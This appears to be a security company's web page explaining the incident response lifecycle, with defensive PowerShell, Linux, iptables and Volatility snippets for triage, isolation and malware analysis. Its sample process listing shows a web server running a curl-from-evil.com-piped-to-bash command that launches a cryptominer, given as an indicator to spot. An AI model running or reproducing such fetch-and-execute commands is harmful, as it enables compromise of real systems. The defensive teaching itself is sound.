Incident Response

In cybersecurity, the core mindset of incident response is when, not if. A breach is inevitable. Our mission is to ensure that when it occurs, it is handled with military precision to minimize damage, reduce recovery time, and ensure business continuity.

At Code 0, we develop and execute robust incident response frameworks aligned with international standards like ISO 27035 and European regulatory requirements. Our approach is systematic, technically advanced, and forged in the crucible of real-world breaches. We don't just follow a checklist; we execute a battle plan designed to outmaneuver adversaries and restore operational integrity with speed and precision. This requires a deep, technical understanding of both offensive tactics, techniques, and procedures (TTPs) and defensive countermeasures, moving far beyond generic advice to provide actionable, decisive intervention when it matters most. Our team operates with the urgency of a crisis and the precision of a scalpel, recognizing that every second counts and every action must be deliberate.

The Incident Response Lifecycle (PICERL)

We model our IR methodology on the widely adopted PICERL framework (Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned), ensuring a comprehensive and structured approach to crisis management. This isn't a theoretical exercise; it's an operational sequence that guides every action from proactive readiness to post-incident fortification. Each phase is critical and builds upon the last, forming a continuous loop of improvement that enhances an organization's resilience over time. A failure in one phase, particularly Preparation, has a cascading negative effect on all subsequent phases, underscoring the importance of a holistic and practiced approach. Our expertise lies in executing each of these phases with a level of technical depth and operational tempo that modern threats demand, ensuring that actions are not just performed, but performed correctly under extreme pressure.

flowchart LR
    subgraph Proactive Phase
        A@{ shape: circle, label: "Preparation" }
    end

    subgraph Reactive Operations
        B@{ shape: stadium, label: "Identification" } --> C@{ shape: diamond, label: "Containment" } --> D@{ shape: subroutine, label: "Eradication" } --> E@{ shape: subroutine, label: "Recovery" }
    end
    
    subgraph Continuous Improvement
        F@{ shape: rect, label: "Lessons Learned" }
    end

    A --> B
    E --> F
    F --> A

    style A fill:#1e3a8a,stroke:#3b82f6,stroke-width:2px,color:#fff
    style B fill:#3730a3,stroke:#6d28d9,stroke-width:2px,color:#fff
    style C fill:#4c1d95,stroke:#8b5cf6,stroke-width:2px,color:#fff
    style D fill:#5b21b6,stroke:#a78bfa,stroke-width:2px,color:#fff
    style E fill:#064e3b,stroke:#10b981,stroke-width:2px,color:#fff
    style F fill:#78350f,stroke:#f59e0b,stroke-width:2px,color:#fff
                        

1. Preparation: Forging the Shield Wall

A team of security professionals in a command center, planning and preparing for potential threats.

Victory in an incident is decided long before the first alert fires. The Preparation phase is the most critical, yet often the most neglected. A well-prepared organization transforms a potential catastrophe into a managed, predictable event. This goes far beyond simply having an IR document sitting on a shelf. It involves the meticulous development of scenario-specific playbooks for high-impact threats like ransomware, business email compromise (BEC), and sophisticated data exfiltration campaigns. These are not static documents; they are living battle plans that detail roles, communication trees, legal considerations, and precise technical steps. We ensure this readiness is ingrained through rigorous team training, including realistic tabletop exercises and intense, live-fire purple team engagements where we simulate adversary TTPs against live defenses. The cornerstone of technical preparation is the deployment and continuous tuning of a modern security stack. While a well-configured SIEM is essential for log aggregation, the true non-negotiable is a powerful **Endpoint Detection & Response (EDR)** platform. Tools like SentinelOne, CrowdStrike, or an expertly hardened Wazuh deployment provide the deep endpoint telemetry (process execution, network connections, API calls) and immediate response capabilities (host isolation, remote shell) required to effectively combat modern adversaries. Without this level of endpoint visibility and control, any response effort is fundamentally compromised, operating on incomplete data and with significant delays. This phase also includes ensuring that logging levels are appropriate across all critical systems, that network segmentation is in place to limit blast radius, and that immutable, offline backups are tested regularly. A plan that has never been tested is not a plan; it is a theory, and a crisis is the worst possible time to test a theory.
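
Readiness must also be verified, not assumed. As a quick spot-check, the sketch below is an illustrative example only, assuming a Linux host running auditd and a Wazuh agent; substitute your own EDR agent's service name and ports. It confirms that the telemetry pipeline a responder will later depend on is actually alive.

Spot-Check Endpoint Telemetry Readiness
# A minimal readiness sketch, not a full audit. Assumes auditd and a Wazuh agent;
# adjust service names and ports to your own stack.
sudo systemctl is-active wazuh-agent auditd   # are the telemetry agents running?
sudo auditctl -l                              # list loaded audit rules ("No rules" means no kernel audit coverage)
sudo ss -tpn | grep ':1514'                   # is the agent connected to its manager? (Wazuh's default agent port)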

2. Identification: Sounding the Alarm & Live Forensics

A security analyst triaging alerts on a multi-screen setup, with data streams and threat indicators.

The Identification phase begins the moment an anomaly is detected. The objective is rapid, accurate validation to determine if a security event is a genuine incident. While alerts from security tools are a valuable starting point, relying on them alone is a passive, reactive stance that concedes the initiative to the attacker. Our approach is centered on proactive **Threat Hunting** and **Live Forensics**. Instead of immediately pulling a full disk image—a time-consuming process that can tip off the adversary—we start by interrogating live systems using their native tools to understand what's happening in real-time. This allows us to find the point of entry, determine the scope of the compromise, and gather critical indicators without disrupting operations or losing volatile memory-resident evidence. On Windows, PowerShell is indispensable for this. We can quickly analyze network connections, running processes, and common persistence mechanisms. A key tactic is to correlate network connections with the processes that own them, immediately highlighting unauthorized software phoning home or legitimate system processes that have been hijacked. On Linux, we use a combination of command-line tools to dissect the system's state, looking for tell-tale signs of compromise like unusual process hierarchies (e.g., a web server spawning a bash shell) or recently modified files in sensitive system directories. This initial, hands-on triage provides the high-fidelity intelligence needed to make informed decisions in the subsequent phases. This process is an art as much as a science, requiring an analyst to distinguish the faint signal of malicious activity from the overwhelming noise of normal system operations, a skill only developed through extensive real-world experience.

Windows Triage with PowerShell

PowerShell is the primary interface for live response on Windows. We use it to enumerate system state, focusing on common persistence locations and indicators of execution. The goal is to quickly find anomalies. For example, a reverse shell established by malware will show up as an established TCP connection owned by an unusual process.

Correlate Network Connections to Processes
PS C:\Users\Administrator> Get-NetTCPConnection | Where-Object { $_.State -eq 'Established' } | ForEach-Object {
    $ProcessInfo = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue | Select-Object -Property Name, Path
    [PSCustomObject]@{
        Protocol      = 'TCP'
        LocalPort     = $_.LocalPort
        RemoteAddress = $_.RemoteAddress
        RemotePort    = $_.RemotePort
        Process       = $ProcessInfo.Name
        Path          = $ProcessInfo.Path
    }
} | Format-Table

Protocol LocalPort RemoteAddress RemotePort Process    Path
-------- --------- ------------- ---------- -------    ----
TCP      49753     104.21.27.18  443        chrome     C:\Program Files\Google\Chrome\Application\chrome.exe
TCP      51134     192.0.73.2    443        OUTLOOK    C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
TCP      49999     192.168.1.10  4444       powershell C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
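
Network telemetry is only half the picture during live triage. The complementary sketch below (illustrative, not exhaustive) dumps every process with its full command line and parent process ID, since attackers frequently hide behind legitimate binary names while the command line or parent relationship gives them away, for example an Office application spawning powershell.exe with an encoded command.

List Process Command Lines and Parent/Child Relationships
PS C:\Users\Administrator> Get-CimInstance -ClassName Win32_Process |
    Select-Object -Property ProcessId, ParentProcessId, Name, CommandLine |
    Sort-Object -Property ParentProcessId |
    Format-Table -Wrap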

Linux Triage with Standard Binaries

On Linux, an attacker's first actions often involve establishing persistence and modifying system files. Hunting for these changes is critical for identification. We look for out-of-place files, unusual permissions, and recently modified binaries or configuration files. Understanding the process tree and listening ports gives us a clear picture of the system's current state and any unauthorized activity.

Check for Rogue Processes and File Modifications
analyst@compromised-box:~$ ss -tulpn
State      Recv-Q Send-Q  Local Address:Port    Peer Address:Port   Process
LISTEN     0      4096    127.0.0.1:33060         0.0.0.0:*           users:(("mysqld",pid=123,fd=3))
LISTEN     0      128     0.0.0.0:22              0.0.0.0:*           users:(("sshd",pid=456,fd=3))
LISTEN     0      511     *:80                    *:*                 users:(("apache2",pid=789,fd=4))
LISTEN     0      128     *:1337                  *:*                 users:(("kworkerds",pid=10115,fd=7))

analyst@compromised-box:~$ ps -ef --forest
UID          PID    PPID  C STIME TTY          TIME CMD
www-data     789       1  0 10:00 ?        00:00:05 /usr/sbin/apache2 -k start
www-data   10111     789  0 10:30 ?        00:00:00  \_ /bin/bash -c "curl -s http://evil.com/s.sh | bash"
www-data   10112   10111  0 10:30 ?        00:00:00      \_ /bin/bash
www-data   10115   10112  5 10:30 ?        00:00:01          \_ ./kworkerds -cDU -o pool.supportxmr.com:3333
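
To cover the file-modification side of the triage, the short sketch below (illustrative paths; tune the time window to the suspected intrusion timeframe) hunts for recently changed files in sensitive locations and reviews the usual Linux persistence points.

Hunt for Recently Modified Files and Persistence Entries
# Files changed in the last 3 days under sensitive paths (adjust -mtime to your window)
sudo find /etc /usr/local/bin /var/www -type f -mtime -3 -ls 2>/dev/null

# Review cron-based persistence for system and service accounts
sudo ls -la /etc/cron.d /etc/cron.daily 2>/dev/null
sudo crontab -l -u www-data 2>/dev/null

# Check for unexpected SSH keys dropped for privileged or service accounts
sudo find /root /home -maxdepth 3 -name authorized_keys -ls 2>/dev/null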

3. Containment: Cutting Off the Breach

A digital firewall containing a red, chaotic network, representing containment.

Once an incident is validated, immediate and effective containment is paramount to stop the bleeding. The goal is to prevent the adversary from deepening their foothold, moving laterally to other systems, or exfiltrating data. The legacy approach of physically unplugging a server from the network is a clumsy, slow, and often counter-productive measure; it causes unnecessary operational disruption and, critically, severs the IR team's ability to perform remote forensics, effectively destroying the crime scene. The modern TTP, enabled by our EDR toolkit, is surgical **Host Network Isolation**. With a single command, the EDR agent on the compromised host instantly applies pre-configured firewall rules that block all inbound and outbound traffic *except* for the secure, encrypted channel to the EDR management console. This surgically removes the machine from the network, neutralizing the threat of lateral movement or command-and-control (C2) communication, while simultaneously granting our analysts full, uninterrupted remote access to perform live forensics. It's the digital equivalent of placing a patient in a hermetically sealed quarantine chamber while retaining full diagnostic access. For broader network-level containment, especially in environments without ubiquitous EDR, we can implement rules directly on network infrastructure or use host-based firewalls like `iptables` to create a custom isolation policy on the fly, ensuring that even if one system is compromised, the blast radius is strictly controlled and minimized. Containment is a balancing act between security and business continuity, and our experienced responders know how to make calibrated decisions to isolate the threat without bringing the entire organization to a halt.

Isolating a Host with iptables
# 1. Flush all existing rules and user-defined chains to start fresh (use with caution)
sudo iptables -F
sudo iptables -X

# 2. Allow loopback traffic (essential for many local services)
sudo iptables -A INPUT -i lo -j ACCEPT
sudo iptables -A OUTPUT -o lo -j ACCEPT

# 3. Allow established connections to continue (e.g., your current SSH session)
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED -j ACCEPT

# 4. (CRITICAL) Allow new traffic ONLY to/from the IR team's analysis host
sudo iptables -A INPUT -s YOUR_ANALYSIS_IP -j ACCEPT
sudo iptables -A OUTPUT -d YOUR_ANALYSIS_IP -j ACCEPT

# 5. Only now set the default policies to DROP everything else; doing this last
#    avoids cutting off your own remote session before the ACCEPT rules exist
sudo iptables -P INPUT DROP
sudo iptables -P FORWARD DROP
sudo iptables -P OUTPUT DROP

# The host is now isolated, only able to communicate with your analysis machine.
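
Before stepping away, verify the resulting policy with `iptables -L -v -n`. Note that on most distributions these rules will not survive a reboot unless explicitly saved, which is usually acceptable, and sometimes even desirable, during an active response.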

4. Eradication & Malware Analysis

An analyst meticulously removing malicious code from a system's digital core.

Eradication is the systematic and complete removal of every adversary artifact from the environment. This phase is far more complex than simply deleting a discovered malware executable. It requires a deep, forensic-level investigation to identify and neutralize not just the malicious payload, but also its supporting components and, most importantly, its persistence mechanisms. Adversaries are experts at maintaining access and will almost always establish multiple ways to re-enter a compromised system. These can range from simple techniques like creating new user accounts or scheduled tasks, to more sophisticated methods like DLL hijacking, COM object manipulation, or installing rootkits and bootkits. Failing to find and eliminate every single persistence mechanism is a critical failure, as it effectively leaves a backdoor open for the attacker to return at will. Our process involves a meticulous sweep of the filesystem, registry (on Windows), system configurations, and memory to hunt for these artifacts. Once a suspicious binary is identified, we begin malware analysis. This starts with hashing the file and querying threat intelligence platforms like VirusTotal and MISP for known indicators. We then perform static analysis to examine the file's structure, strings, and imported functions for clues about its purpose. The final step is dynamic analysis, where we detonate the malware in a fully instrumented, isolated sandbox environment to observe its behavior in a safe setting, confirming its capabilities and gathering crucial intelligence for the final cleanup and reporting. This ensures we don't just remove the weed, but pull out every last root.
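
The first minutes of malware analysis follow a repeatable pattern: hash, enrich, then look inside. The sketch below is a minimal illustration of that triage flow, assuming a suspicious binary at a hypothetical path and a VirusTotal API key exported as VT_API_KEY.

Hash and Enrich a Suspicious Binary
# Hypothetical sample path; copy the file to an analysis host before touching it.
SAMPLE=/cases/triage/kworkerds

sha256sum "$SAMPLE"                     # fingerprint for threat-intel lookups and chain of custody
file "$SAMPLE"                          # quick static look: file type, architecture, packing hints
strings -n 8 "$SAMPLE" | head -n 40     # readable strings: URLs, mutexes, mining pools, C2 hints

# Query VirusTotal's v3 API for existing detections of this hash (requires an API key)
HASH=$(sha256sum "$SAMPLE" | awk '{print $1}')
curl -s -H "x-apikey: $VT_API_KEY" "https://www.virustotal.com/api/v3/files/$HASH"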

Uncovering Windows Persistence

Attackers love Windows Scheduled Tasks for persistence. Default PowerShell cmdlets often hide the most important detail: the executable path. We use more advanced techniques to dump all tasks and their actions for analysis, as a simple `Get-ScheduledTask` is insufficient for true forensic insight. The command below forces PowerShell to iterate through each task and explicitly pull the `Execute` property from the `Actions` object, revealing the full path of what will be run.

Extract Executables from All Scheduled Tasks
# This one-liner iterates through all scheduled tasks, extracts the 'Execute' path
# from the Actions property, and builds a clean list for review.
Get-ScheduledTask | ForEach-Object { 
    $action = $_.Actions | Select-Object -ExpandProperty Execute -ErrorAction SilentlyContinue
    if ($action) {
        [PSCustomObject]@{ 
            TaskName = $_.TaskName;
            Execute = $action 
        } 
    }
} | Format-Table -Wrap
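
Scheduled tasks are only one of many autostart locations. The hedged sketch below checks the classic Run and RunOnce registry keys for both the machine and the current user; a full sweep would also cover services, WMI subscriptions, and the many other locations enumerated by tools like Sysinternals Autoruns.

Review Run and RunOnce Registry Keys
# Enumerate the classic autostart registry keys for HKLM and HKCU.
$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
foreach ($key in $runKeys) {
    if (Test-Path $key) {
        Get-ItemProperty -Path $key |
            Select-Object -Property * -ExcludeProperty PSPath, PSParentPath, PSChildName, PSDrive, PSProvider |
            Format-List
    }
}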

Top-Tier Incident Response Tools

Effective incident response requires a potent arsenal of specialized tools. While the skill of the analyst is paramount, these platforms provide the necessary visibility, analytical power, and response capabilities to operate at the speed and scale required to defeat modern adversaries. From interactive sandboxes that detonate malware in a safe environment to memory forensics frameworks that can uncover fileless threats, this toolkit is essential for every phase of the IR lifecycle. An analyst must have deep, hands-on experience with these tools to be effective under pressure, knowing which tool to deploy for a given situation and how to interpret its output correctly. The difference between a master and a novice is not knowing the tools exist, but knowing exactly how and when to use them to maximum effect. We maintain expertise across the entire spectrum of best-in-class commercial and open-source DFIR tooling.

Essential Online Tools & Services

| Tool | Primary Function | Use Case |
| --- | --- | --- |
| ANY.RUN | Interactive Malware Sandbox | Safely executing suspicious files and URLs in an isolated cloud environment to observe their behavior, network traffic, and process activity in real time. |
| VirusTotal | File & URL Reputation Service | Quickly checking the reputation of a file hash, domain, or IP address against dozens of antivirus engines and blocklist services. |

Key Open-Source DFIR Tools on GitHub

| Tool | Primary Function | Use Case |
| --- | --- | --- |
| Volatility 3 | Memory Forensics | Analyzing volatile memory (RAM) dumps from Windows, Linux, and Mac systems to find fileless malware, rootkits, and injected code. |
| Velociraptor | Endpoint Collection & Analysis | A powerful tool for collecting and hunting for forensic artifacts across a fleet of endpoints simultaneously using a flexible query language (VQL). |
| Autopsy | Disk Forensics Platform | A graphical interface to The Sleuth Kit and other forensic tools for in-depth analysis of disk images, file systems, and registry hives. |
| GRR Rapid Response | Live Forensics Framework | An agent-based system for remotely performing live forensics on a large number of machines, focusing on triage and targeted data collection. |
| TheHive | Security Incident Response Platform | A collaborative platform for managing incidents, tracking observables, and orchestrating response actions. It integrates with MISP and other tools. |
| MISP | Threat Intelligence Platform | Collecting, correlating, and sharing Indicators of Compromise (IOCs) and threat intelligence with other security tools and trusted partners. |
| osquery | Endpoint Querying & Auditing | Using an SQL-like syntax to query low-level operating system information across a fleet of endpoints, enabling large-scale threat hunting and compliance checks. |
| Plaso / Log2timeline | Super Timeline Creation | Extracting timestamps from hundreds of different types of forensic artifacts (logs, registry, filesystems) and merging them into a single chronological timeline of events. |
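
As a concrete illustration of how this tooling is applied in practice, the sketch below shows a typical first pass over a memory image with Volatility 3, assuming the framework is installed and exposed as the `vol` command and that an image has already been acquired to a hypothetical path.

First-Pass Memory Triage with Volatility 3
# Hypothetical image path; acquire memory with a trusted tool before analysis.
IMAGE=/cases/triage/host01.raw

vol -f "$IMAGE" windows.info       # confirm the image parses and identify the OS build
vol -f "$IMAGE" windows.pslist     # enumerate processes recorded in memory
vol -f "$IMAGE" windows.netscan    # recover network connection artifacts from memory
vol -f "$IMAGE" windows.malfind    # flag memory regions consistent with injected code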

5. Recovery: Resilient Restoration

A system being rebuilt with green, glowing lines, representing a secure recovery.

The Recovery phase is the carefully orchestrated process of returning systems to full operational capacity safely and securely. It is not a race to get back online; it is a methodical process designed to ensure the adversary has been completely evicted and cannot regain entry. The cornerstone of a successful recovery is the availability of clean, verified, and isolated backups. We work with our clients to restore systems from these known-good backups, which must pre-date the earliest known time of compromise. Before any system is reconnected to the production network, it undergoes a rigorous hardening and verification process. This includes applying all relevant security patches, reverting to a secure baseline configuration, resetting all credentials associated with the system, and performing a final vulnerability scan to ensure no weaknesses remain. The return to service is almost always phased, with the most critical business functions being restored first. Throughout this period, the recovered systems are placed under a state of heightened monitoring, with more sensitive alert thresholds and intensive log review, to provide immediate warning of any residual or new suspicious activity. This deliberate and cautious approach ensures that the recovered environment is not just a clone of the old one, but a more resilient, hardened, and defensible platform, turning the incident into an opportunity to upgrade the organization's security posture. Full recovery is only declared when business operations are restored *and* the security team has verified the integrity of the environment and is confident in its ability to detect any future attempts.
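
One check worth making explicit, shown below as a minimal sketch with hypothetical paths and timestamps, is confirming that a candidate restore point both pre-dates the earliest confirmed attacker activity and still matches the checksum recorded when the backup was taken.

Verify a Restore Point Before Recovery
# Hypothetical values; replace with the real compromise window and backup paths.
COMPROMISE_TS="2024-03-10 02:15:00 UTC"      # earliest confirmed attacker activity
BACKUP="/mnt/backups/db01-full.tar.gz"       # candidate restore point

compromise_epoch=$(date -d "$COMPROMISE_TS" +%s)
backup_epoch=$(stat -c %Y "$BACKUP")

if [ "$backup_epoch" -lt "$compromise_epoch" ]; then
    echo "OK: backup pre-dates the compromise window"
else
    echo "DO NOT RESTORE: backup was written after the earliest known compromise"
fi

# Verify integrity against the checksum recorded at backup time (assumed manifest file)
sha256sum -c "${BACKUP}.sha256"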

6. Lessons Learned: Forging Future Defenses

A team of analysts reviewing incident data on a large screen, debriefing and planning.

This final phase is arguably as important as Preparation, as it closes the IR loop and transforms the cost and pain of an incident into a direct investment in future security. We lead a blameless post-mortem analysis of the entire event, from initial detection to full recovery. The primary objective is not to assign blame to individuals or teams, but to perform a ruthless, objective dissection of the organization's people, processes, and technology to identify systemic gaps and failures that allowed the breach to occur and persist. Key questions we drive to answer include: What were the earliest indicators and why were they missed? Where did our detection capabilities fail? Were our response playbooks accurate and effective, or did they crumble under pressure? Did our tools provide the necessary visibility and control? The findings from this deep-dive analysis are compiled into a comprehensive report containing not just a narrative of the event, but a list of concrete, actionable recommendations with assigned owners and timelines. This crucial feedback loop ensures that security policies are updated with real-world data, IR playbooks are refined, technology gaps are addressed through new investments or configurations, and training programs are adapted to counter the specific TTPs used by the adversary. This process ensures the organization doesn't just recover, but evolves, making its defenses measurably stronger and more resilient against future attacks. Without this phase, an organization is doomed to repeat its past failures.
